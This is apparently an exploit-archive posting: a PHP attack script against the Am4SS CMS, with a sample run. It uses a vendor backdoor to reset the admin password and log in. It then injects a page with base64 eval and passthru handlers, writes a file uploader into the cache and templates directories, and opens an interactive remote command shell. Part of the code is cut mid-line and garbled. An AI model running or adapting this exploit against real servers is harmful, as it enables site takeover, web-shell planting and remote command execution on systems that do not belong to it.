10/2011 , Vulnerability discovered > till now , i haven't reported the vendor , why!!! The idiot backdoored it by himself + the official site is fucked up ;) > 19/07/2012 , Public Disclosured C:\lab>php am4ss.php localhost /lab/am4ss/ +---------------------------------------+ | Am4SS , PHP Code Injection | | Exploited By i-Hmx | | [email protected] | | sec4ever.com , 1337s.cc | +---------------------------------------+ | Testing Authentication | Injecting our Evil php code | Searching for Injected PageID => 0 => 1 => 2 => 3 => 4 => 5 | Injected ID is 5 | I Have wrriten Tiny uploader at : + localhost/lab/am4ss//am4ss_cache/fa.php + localhost/lab/am4ss//templates/fa.php | sec4ever shell online ;) [email protected]# net user User accounts for \\ ------------------------------------------------------------------------------- Administrator ASPNET Guest HelpAssistant IUSR_PHOENIX-XP IWAM_PHOENIX-XP PhoeniX PhoeniX.Limited SUPPORT_388945a0 The command completed with one or more errors. [email protected]# exit */ if(!$argv[2]) { echo "\n+ usage : php ".$argv[0]." [Target without http://] /path/\nex : php ".$argv[0]." site.com /support/\n"; exit(); } session_start(); echo "\n+---------------------------------------+\n"; echo "| Am4SS , PHP Code Injection |\n"; echo "| Exploited By i-Hmx |\n"; echo "| [email protected] |\n"; echo "| sec4ever.com , 1337s.cc |\n"; echo "+---------------------------------------+\n"; $host=$argv[1]; $_SESSION['host']=$host; $path=$argv[2]; $vic=$host.$path; function kastr($string, $start, $end){ $string = " ".$string; $ini = strpos($string,$start); if ($ini == 0) return ""; $ini += strlen($start); $len = strpos($string,$end,$ini) - $ini; return substr($string,$ini,$len); } function get($url,$post,$cookies){ $curl=curl_init(); curl_setopt($curl,CURLOPT_RETURNTRANSFER,1); curl_setopt($curl,CURLOPT_URL,"http://".$url); curl_setopt($curl, CURLOPT_POSTFIELDS,$post); curl_setopt($curl,CURLOPT_COOKIE,$cookies); curl_setopt($curl,CURLOPT_FOLLOWLOCATION,0); curl_setopt($curl,CURLOPT_TIMEOUT,20); $exec=curl_exec($curl); curl_close($curl); return $exec; } /* Enabling the Dirty Backdoor */ $ok=kastr($vic,"http://","//"); if (!eregi($host,urlencode(get($vic."/libs/internals/core.assign_by_ref.php?password=ef211a58a6a04914923a7bf23a9a7f0c&username=%C7%E1%D4%D1%DE%C7%E6%ED&country=%C7%E1%E3%DB%D1%C8",'','')))) { die("+ Exploitation Failed :("); } /* authenticating using the updated admin data */ echo "| Testing Authentication\n"; if(!eregi('',get($vic."/admincp/settings.php","",'[email protected];Am4sS_CPCHERKAOUI_PassWord=ef211a58a6a04914923a7bf23a9a7f0c'))) { /* login may failed due to bad connection , admincp path error , admin firewall . . . etc any way u can use the following data to login manually */ echo "| Authentication Failed\n| Try to login manually using :\n + User : [email protected]\n + Password : kawkawa\n | auth cookies : \n + Am4sS_CPCHERKAOUI_UserEmail : [email protected]\n + Am4sS_CPCHERKAOUI_PassWord : ef211a58a6a04914923a7bf23a9a7f0c \n+ Exiting \n"; die(); } /* Creating new page to inject our evil php code */ $facode='echo "

Faris on the mic ;)
";@eval(base64_decode($_REQUEST[fa]));echo "faris>>>";passthru(base64_decode($_SERVER[HTTP_CMD]));echo "<< $f\n";
 if(eregi(">>>",$mypage))
 {
 $_SESSION['id']=$f;
 break;
 }
}
$myid=$_SESSION['id'];
echo "| Injected ID is $myid\n";
/*
Injecting tinni file uploader at the cache and the templates directories
these usually chmoded to 777 by the admin
*/
get($vic."pages.php?pageid=$myid&fa=JGNvZGUgPSBiYXNlNjRfZGVjb2RlKCJQRDl3YUhBTkNtVmphRzhnSnp4bWIzSnRJR0ZqZEdsdmJqMGlJaUJ0WlhSb2IyUTlJbkJ2YzNRaUlHVnVZM1I1Y0dVOUltMTFiSFJwY0dGeWRDOW1iM0p0TFdSaGRHRWlJRzVoYldVOUluVndiRzloWkdWeUlpQnBaRDBpZFhCc2IyRmtaWElpUGljN0RRcGxZMmh2SUNjOGFXNXdkWFFnZEhsd1pUMGlabWxzWlNJZ2JtRnRaVDBpWm1sc1pTSWdjMmw2WlQwaU5UQWlQanhwYm5CMWRDQnVZVzFsUFNKZmRYQnNJaUIwZVhCbFBTSnpkV0p0YVhRaUlHbGtQU0pmZFhCc0lpQjJZV3gxWlQwaVZYQnNiMkZrSWo0OEwyWnZjbTArSnpzTkNtbG1LQ0FrWDFCUFUxUmJKMTkxY0d3blhTQTlQU0FpVlhCc2IyRmtJaUFwSUhzTkNnbHBaaWhBWTI5d2VTZ2tYMFpKVEVWVFd5ZG1hV3hsSjExYkozUnRjRjl1WVcxbEoxMHNJQ1JmUmtsTVJWTmJKMlpwYkdVblhWc25ibUZ0WlNkZEtTa2dleUJsWTJodklDYzhZajVWY0d4dllXUWdVMVZMVTBWVElDRWhJVHd2WWo0OFluSStQR0p5UGljN0lIME5DZ2xsYkhObElIc2daV05vYnlBblBHSStWWEJzYjJGa0lFZEJSMEZNSUNFaElUd3ZZajQ4WW5JK1BHSnlQaWM3SUgwTkNuME5DajgrIik7CiRmID0gZm9wZW4oImFtNHNzX2NhY2hlL2ZhLnBocCIsInciKTsKJHQgPSBmb3BlbigidGVtcGxhdGVzL2ZhLnBocCIsInciKTsKZndyaXRlKCRmLCRjb2RlKTsKZndyaXRlKCR0LCRjb2RlKTs=","","");
echo "| I Have wrriten Tiny uploader at :\n   + $vic/am4ss_cache/fa.php\n   + $vic/templates/fa.php\n";
/*
printing sec4ever1337s via passthru()
to check if it's enabled or not
*/
if (!eregi("sec4ever1337s",get($vic."/pages.php?pageid=$f&fa=cGFzc3RocnUoJ2VjaG8gc2VjNGV2ZXIxMzM3cycpOw==","","")))
{
echo "| passthru is disabled \n";
echo "| You can evaluate Your code at:\n    $vic/pages.php?pageid=$myid&fa=base64_encode(eval code)\n";
exit('+ Exiting');
}
echo "| sec4ever shell online ;)\n";
/*
if passthru() is enabled , then get small command executer
using Egix fsock method to send and retrieve data
*/
function http_send($host, $packet)
{
$sock = fsockopen($host, 80);
fputs($sock, $packet);
return stream_get_contents($sock);
}
$packet  = "GET /{$path}/pages.php?pageid=$myid HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cmd: %s\r\n";
$packet .= "Connection: close\r\n\r\n";
while(1)
{
print "\[email protected]".$_SESSION['host']."# ";
if (($fa = trim(fgets(STDIN))) == "exit") exit("\n+ Exiting");
$response = http_send($host, sprintf($packet, base64_encode($fa)));
$final=kastr($response,"faris>>>","<<



#  0day.today [2018-02-05]  #

Query Builder